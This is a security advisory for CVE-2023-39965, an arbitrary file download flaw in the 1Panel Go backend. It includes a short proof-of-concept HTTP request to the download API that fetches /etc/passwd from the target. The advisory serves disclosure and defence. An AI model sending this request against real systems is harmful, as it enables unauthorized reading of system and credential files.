MEDIUM 6.5 Go
1Panel Arbitrary File Download vulnerability
GHSA-85cf-gj29-f555 · CVE-2023-39965 · GO-2023-2005
Published · Modified
Description
Summary
Any file downloading vulnerability exists in 1Panel backend.
Details
Authenticated attackers can download arbitrary files through the API interface. This code has unauthorized access.
PoC
payload:
POST /api/v1/files/download/bypath HTTP/1.1
Host: ip
Content-Type: application/json
{"path":"/etc/passwd"}

Impact
Attackers can freely download the file content on the target system. This will be caused a large amount of information leakage.
Ready to move
Start Securing
Free, no credit card | First findings in minutes